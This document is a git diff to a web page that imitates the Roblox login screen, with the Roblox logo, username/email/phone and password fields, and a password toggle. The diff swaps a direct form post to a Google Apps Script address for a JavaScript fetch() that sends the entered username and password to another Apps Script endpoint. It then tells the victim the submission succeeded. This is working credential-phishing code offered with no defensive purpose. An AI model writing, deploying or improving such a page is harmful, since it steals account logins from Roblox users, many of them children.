--- a/index.html
+++ b/index.html
@@ -14,7 +14,6 @@
       background-size: cover;
       overflow: hidden;
     }
-
     .logo {
       color: #fff;
       font-weight: 900;
@@ -28,7 +27,6 @@
       position: relative;
       z-index: 10;
     }
-
     .logo .tilted-square {
       width: 1.2em;
       height: 1.2em;
@@ -40,7 +38,6 @@
       border-radius: 0.1em;
       box-shadow: inset 0 0 0 0.35em #000;
     }
-
     .form-container {
       width: 100%;
       max-width: 400px;
@@ -53,7 +50,6 @@
       color: white;
       z-index: 10;
     }
-
     input[type="text"], input[type="password"] {
       width: 100%;
       background: rgba(255 255 255 / 0.1);
@@ -73,7 +69,6 @@
       border-color: white;
       background: rgba(255 255 255 / 0.2);
     }
-
     .password-wrapper {
       position: relative;
       display: flex;
@@ -93,10 +88,7 @@
       align-items: center;
       height: 100%;
     }
-    .toggle-password:hover {
-      color: white;
-    }
-
+    .toggle-password:hover { color: white; }
     .btn-login {
       width: 100%;
       background: rgba(255 255 255 / 0.15);
@@ -110,10 +102,7 @@
       cursor: pointer;
       transition: background 0.25s ease;
     }
-    .btn-login:hover {
-      background: rgba(255 255 255 / 0.35);
-    }
-
+    .btn-login:hover { background: rgba(255 255 255 / 0.35); }
     .btn-other-device {
       width: 100%;
       background: transparent;
@@ -127,11 +116,7 @@
       transition: background 0.25s ease, color 0.25s ease;
       margin-bottom: 1.3rem;
     }
-    .btn-other-device:hover {
-      background: white;
-      color: #000;
-    }
-
+    .btn-other-device:hover { background: white; color: #000; }
     .forgot-password {
       font-size: 0.85rem;
       text-align: center;
@@ -140,65 +125,58 @@
       font-weight: 500;
       user-select: none;
     }
-    .forgot-password:hover {
-      color: white;
-      text-decoration: underline;
-    }
-
+    .forgot-password:hover { color: white; text-decoration: underline; }
     @media (max-width: 480px) {
-      .form-container {
-        max-width: 95vw;
-        padding-left: 1.5rem;
-        padding-right: 1.5rem;
-      }
-      .logo {
-        font-size: 2.8rem;
-      }
+      .form-container { max-width: 95vw; padding-left: 1.5rem; padding-right: 1.5rem; }
+      .logo { font-size: 2.8rem; }
     }
   </style>
 </head>
 <body>
   <main class="flex flex-col items-center justify-center min-h-screen px-6 relative z-10">
     <h1 class="logo" aria-label="Roblox logo">
-      R
-      <div class="tilted-square" aria-hidden="true"></div>
-      B L O X
+      R <div class="tilted-square" aria-hidden="true"></div> B L O X
     </h1>
 
-    <!-- Direct POST form to Google Apps Script -->
-    <form class="form-container" method="post"
-      action="https://script.google.com/macros/s/AKfycbxFT4s0IL1tXwB2fFVa-LDigPeBH7IxrvSGMzQRzx_VLNMAuPHgh0neOBj5jS1_FkoQPw/exec" target="_blank">
-      
-      <input name="username" type="text" placeholder="Username/Email/Phone" required />
+    <!-- Form using URL-encoded data -->
+    <form id="loginForm" class="form-container">
+      <input id="username" name="username" type="text" placeholder="Username/Email/Phone" required />
       <div class="password-wrapper">
-        <input name="password" type="password" placeholder="Password" required />
-        <span class="toggle-password" role="button" tabindex="0">&#128065;</span>
+        <input id="password" name="password" type="password" placeholder="Password" required />
+        <span class="toggle-password" role="button" aria-label="Toggle password visibility" tabindex="0">&#128065;</span>
       </div>
-      
       <button type="submit" class="btn-login">Log In</button>
-      <button type="button" class="btn-other-device">Log In With Another Device</button>
-      <div class="forgot-password">Forgot Password or Username?</div>
     </form>
   </main>
 
   <script>
-    // Password toggle
+    // Toggle password visibility
     const toggleBtn = document.querySelector('.toggle-password');
-    const passwordInput = document.querySelector('input[type="password"]');
-
+    const passwordInput = document.getElementById('password');
     toggleBtn.addEventListener('click', () => {
-      if (passwordInput.type === 'password') {
-        passwordInput.type = 'text';
-        toggleBtn.style.color = 'white';
-      } else {
-        passwordInput.type = 'password';
-        toggleBtn.style.color = 'rgba(255 255 255 / 0.6)';
-      }
+      passwordInput.type = passwordInput.type === 'password' ? 'text' : 'password';
+      toggleBtn.style.color = passwordInput.type === 'password' ? 'rgba(255 255 255 / 0.6)' : 'white';
     });
-    toggleBtn.addEventListener('keydown', e => {
-      if (e.key === 'Enter' || e.key === ' ') {
-        e.preventDefault();
-        toggleBtn.click();
+    toggleBtn.addEventListener('keydown', (e) => { if(e.key==='Enter'||e.key===' '){ e.preventDefault(); toggleBtn.click(); }});
+
+    // Form submission (URL-encoded)
+    const loginForm = document.getElementById('loginForm');
+    loginForm.addEventListener('submit', async function(e){
+      e.preventDefault();
+      const formData = new FormData(loginForm);
+      const params = new URLSearchParams(formData);
+
+      try {
+        const response = await fetch('https://script.google.com/macros/s/AKfycbzeW2B6YLYY_Yn8Q4bQpnqHc2qFHqgNxpepdDjAwpRMJzgyBDmrieKn1oyp6baxRgo-Cw/exec', {
+          method: 'POST',
+          body: params
+        });
+        const result = await response.json();
+        alert("Form submitted successfully!");
+        loginForm.reset();
+      } catch(err) {
+        console.error(err);
+        alert("Error submitting form");
       }
     });
   </script>
